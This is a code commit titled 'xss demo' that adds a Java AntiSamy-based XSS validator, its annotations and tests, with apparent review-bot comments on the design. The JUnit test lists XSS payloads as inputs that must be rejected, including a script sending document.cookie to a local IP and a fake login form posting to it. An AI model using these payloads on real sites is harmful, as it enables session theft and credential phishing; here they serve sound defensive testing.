fef5ddec
Commit
fef5ddec
authored
Jul 16, 2022
by
zengtianlai3
xss demo
parent
08a02601
Changes
5
Showing
5 changed files
with
247 additions
and
0 deletions
+247
-0
Length.java
.../src/main/java/iot/sixiang/license/validation/Length.java
+38
-0
MainTest.java
...rc/main/java/iot/sixiang/license/validation/MainTest.java
+25
-0
NoXss.java
...e/src/main/java/iot/sixiang/license/validation/NoXss.java
+34
-0
NoXssValidator.java
...n/java/iot/sixiang/license/validation/NoXssValidator.java
+88
-0
NoXssValidatorTest.java
...va/iot/sixiang/license/validation/NoXssValidatorTest.java
+62
-0
license/src/main/java/iot/sixiang/license/validation/Length.java
0 → 100644
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.Constraint
;
import
javax.validation.Payload
;
import
java.lang.annotation.ElementType
;
import
java.lang.annotation.Retention
;
import
java.lang.annotation.RetentionPolicy
;
import
java.lang.annotation.Target
;
@Retention
(
RetentionPolicy
.
RUNTIME
)
@Target
(
ElementType
.
FIELD
)
@Constraint
(
validatedBy
=
{})
public
@interface
Length
{
String
message
()
default
"length of {fieldName} must be equal or less than {max}"
;
String
fieldName
();
int
max
()
default
255
;
Class
<?>[]
groups
()
default
{};
Class
<?
extends
Payload
>[]
payload
()
default
{};
}
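Review bot: `@Constraint(validatedBy = {})` on `Length` names no validator and this commit adds no `ConstraintValidator` for it, so `max` and `fieldName` are never enforced at runtime unless a validator is registered elsewhere (for example a constraint-mapping XML) that is not visible here; Hibernate Validator would presumably reject the constraint at bootstrap when it finds no validator for the annotated field type. `NoXss.java` in this commit has the same empty `validatedBy` even though the commit ships `NoXssValidator`; there it should read `@Constraint(validatedBy = NoXssValidator.class)`. A Javadoc line on `Length` stating that `max` is the inclusive upper bound on the string length, as the default message already implies, would make the intended contract explicit.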
license/src/main/java/iot/sixiang/license/validation/MainTest.java
0 → 100644
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.ConstraintValidatorContext
;
import
static
org
.
junit
.
jupiter
.
api
.
Assertions
.
assertFalse
;
import
static
org
.
mockito
.
Mockito
.
mock
;
/**
* Title: MainTest
* Description: TODO
*
* @author tianlai3
* @date 2022-07-17 00:33:08
*/
public
class
MainTest
{
public
static
void
main
(
String
[]
args
)
{
NoXssValidator
validator
;
validator
=
new
NoXssValidator
();
validator
.
initialize
(
null
);
String
stringWithXss
=
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
;
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
}
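Review bot: `MainTest` lives under `src/main/java` but imports JUnit Jupiter's `Assertions.assertFalse` and Mockito's `mock`, so test-only libraries become compile-time dependencies of the production artifact and the class itself ships in it; `NoXssValidatorTest.java` in this commit has the same placement problem. Move both to `src/test/java`, and drop `MainTest` entirely, since its body duplicates `NoXssValidatorTest.test1` with the same input string. If a runnable smoke check is still wanted, a plain `if (isValid) throw new IllegalStateException(...)` is clearer than calling a JUnit assertion from `main`.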
license/src/main/java/iot/sixiang/license/validation/NoXss.java
0 → 100644
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.Constraint
;
import
javax.validation.Payload
;
import
java.lang.annotation.ElementType
;
import
java.lang.annotation.Retention
;
import
java.lang.annotation.RetentionPolicy
;
import
java.lang.annotation.Target
;
@Retention
(
RetentionPolicy
.
RUNTIME
)
@Target
(
ElementType
.
FIELD
)
@Constraint
(
validatedBy
=
{})
public
@interface
NoXss
{
String
message
()
default
"field value is malformed"
;
Class
<?>[]
groups
()
default
{};
Class
<?
extends
Payload
>[]
payload
()
default
{};
}
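Review bot: `NoXss` carries no Javadoc, and the contract a caller needs is only discoverable by reading `NoXssValidator.isValid`: `null`, non-`String` and empty values pass, and any other string is rejected when the AntiSamy scan reports errors or throws. Suggest adding above the annotation: `/** Rejects String field values that the configured AntiSamy policy reports as containing disallowed HTML/script content. Null, non-String and empty values are accepted. */`. The default message `"field value is malformed"` is fine as a user-facing string, but the Javadoc should say that the actual rule is whatever the policy file allows, so readers know where to look when a legitimate value is rejected.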
license/src/main/java/iot/sixiang/license/validation/NoXssValidator.java
0 → 100644
/**
* Copyright © 2016-2022 The Thingsboard Authors
* <p>
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* <p>
* http://www.apache.org/licenses/LICENSE-2.0
* <p>
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
lombok.extern.slf4j.Slf4j
;
import
org.owasp.validator.html.AntiSamy
;
import
org.owasp.validator.html.Policy
;
import
org.owasp.validator.html.PolicyException
;
import
org.owasp.validator.html.ScanException
;
import
javax.validation.ConstraintValidator
;
import
javax.validation.ConstraintValidatorContext
;
import
java.io.UnsupportedEncodingException
;
import
java.net.URLDecoder
;
import
java.util.Objects
;
@Slf4j
public
class
NoXssValidator
implements
ConstraintValidator
<
NoXss
,
Object
>
{
private
static
final
AntiSamy
xssChecker
=
new
AntiSamy
();
private
static
Policy
xssPolicy
;
@Override
public
void
initialize
(
NoXss
constraintAnnotation
)
{
log
.
info
(
"1 {}"
,
getClass
());
log
.
info
(
"2 {}"
,
getClass
().
getClassLoader
());
log
.
info
(
"xss-policy1 {}"
,
getClass
().
getClassLoader
().
getResourceAsStream
(
"src/main/resources/xss-policy.xml"
));
log
.
info
(
"xss-policy2 {}"
,
getClass
().
getClassLoader
().
getResourceAsStream
(
"xss-policy.xml"
));
String
antiSamyPath
=
Objects
.
requireNonNull
(
NoXssValidator
.
class
.
getClassLoader
().
getResource
(
"antisamy-ebay.xml"
)).
getFile
();
if
(
xssPolicy
==
null
)
{
// 获取的文件路径中有空格时,空格会被替换为%20,在new一个File对象时会出现找不到路径的错误
// 对路径进行解码以解决该问题
try
{
antiSamyPath
=
URLDecoder
.
decode
(
antiSamyPath
,
"utf-8"
);
}
catch
(
UnsupportedEncodingException
e
)
{
log
.
warn
(
e
.
getMessage
());
}
log
.
info
(
antiSamyPath
);
// 指定策略文件
try
{
xssPolicy
=
Policy
.
getInstance
(
antiSamyPath
);
}
catch
(
PolicyException
e
)
{
log
.
warn
(
e
.
getMessage
());
}
// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResource(antiSamyPath))
//// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResource("xss-policy.xml"))
//// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResourceAsStream("xss-policy.xml"))
// .map(inputStream -> {
// try {
// return Policy.getInstance(inputStream);
// } catch (Exception e) {
// throw new RuntimeException(e);
// }
// })
// .orElseThrow(() -> new IllegalStateException("XSS policy file not found"));
}
}
@Override
public
boolean
isValid
(
Object
value
,
ConstraintValidatorContext
constraintValidatorContext
)
{
if
(!(
value
instanceof
String
)
||
((
String
)
value
).
isEmpty
())
{
return
true
;
}
try
{
return
xssChecker
.
scan
((
String
)
value
,
xssPolicy
).
getNumberOfErrors
()
==
0
;
}
catch
(
ScanException
|
PolicyException
e
)
{
return
false
;
}
}
}
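Review bot: `initialize` resolves the policy via `getResource("antisamy-ebay.xml").getFile()` followed by `Policy.getInstance(String)`, which only works while the resource is a plain file on disk; once the class is packaged in a jar the URL is a `jar:` location, `Policy.getInstance` presumably fails with `PolicyException`, the `catch` merely logs it, and `xssPolicy` stays `null`, so every later `isValid` call scans against a null policy and that failure is not among the `ScanException | PolicyException` types caught there, surfacing as an unchecked exception on the first validated request instead of at startup. Load the policy as a stream with `Policy.getInstance(InputStream)`, as the commented-out block in the same method already sketches, and fail fast when it cannot be loaded, so a missing or malformed policy stops the application rather than a request. The four `log.info` calls at the top of `initialize`, including the `"src/main/resources/xss-policy.xml"` lookup that can never resolve on a classpath, look like leftover debugging and should go, and the two Chinese comments should be English for the rest of the team, e.g. `// Decode the path: spaces arrive as %20 and would not resolve as a File`. With the stream-based load the `URLDecoder` step and its `UnsupportedEncodingException` handling disappear; the rewrite needs `java.io.InputStream` and `java.io.IOException` imported. `isValid` correctly fails closed on scan errors, but should log the exception at debug level so policy problems remain diagnosable.
```java
@Override
public void initialize(NoXss constraintAnnotation) {
    if (xssPolicy != null) {
        return;
    }
    // Read the policy from the classpath as a stream: getResource(...).getFile() is not a
    // filesystem path once this class is packaged in a jar.
    try (InputStream in = NoXssValidator.class.getClassLoader().getResourceAsStream("antisamy-ebay.xml")) {
        if (in == null) {
            throw new IllegalStateException("XSS policy file antisamy-ebay.xml not found on classpath");
        }
        xssPolicy = Policy.getInstance(in);
    } catch (IOException | PolicyException e) {
        // Fail closed: a validator without a policy must not start.
        throw new IllegalStateException("Unable to load AntiSamy XSS policy", e);
    }
}
// … unchanged: isValid …
```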
license/src/main/java/iot/sixiang/license/validation/NoXssValidatorTest.java
0 → 100644
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
org.junit.jupiter.api.BeforeAll
;
import
org.junit.jupiter.api.Test
;
import
org.junit.jupiter.params.ParameterizedTest
;
import
org.junit.jupiter.params.provider.ValueSource
;
import
javax.validation.ConstraintValidatorContext
;
import
static
org
.
junit
.
jupiter
.
api
.
Assertions
.
assertFalse
;
import
static
org
.
mockito
.
Mockito
.
mock
;
public
class
NoXssValidatorTest
{
private
static
NoXssValidator
validator
;
@BeforeAll
public
static
void
beforeAll
()
{
validator
=
new
NoXssValidator
();
validator
.
initialize
(
null
);
}
@ParameterizedTest
@ValueSource
(
strings
=
{
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
,
"9090<body onload=alert('xsssss')>90909"
,
"qwerty<script>new Image().src=\"http://192.168.149.128/bogus.php?output=\"+document.cookie;</script>yyy"
,
"bambam<script>alert(document.cookie)</script>"
,
"<p><a href=\"http://htmlbook.ru/example/knob.html\">Link!!!</a></p>1221"
,
"<h3>Please log in to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type=\"username\" name=\"username\"></br>Password:<br><input type=\"password\" name=\"password\"></br><br><input type=\"submit\" value=\"Log in\"></br>"
,
" <img src= \"http://site.com/\" > "
,
"123 <input type=text value=a onfocus=alert(1337) AUTOFOCUS>bebe"
,
})
public
void
testIsNotValid
(
String
stringWithXss
)
{
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
@Test
public
void
test1
(){
String
stringWithXss
=
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
;
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
}
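Review bot: Every case in `testIsNotValid` and `test1` asserts rejection, so a validator that rejects everything — for example one whose policy failed to load in `beforeAll` — passes this suite unchanged; add at least one benign input such as `assertTrue(validator.isValid("plain text 123", mock(ConstraintValidatorContext.class)));` (static import of `Assertions.assertTrue`) and one for the empty string, which `isValid` accepts by design. `test1` repeats the first `@ValueSource` entry verbatim and can be dropped, and the `System.out.println(isValid)` calls add nothing once the assertions carry the result. `beforeAll` passes `null` to `initialize`, which works only because the annotation argument is unused; a short comment saying so would stop the next reader from treating it as a bug.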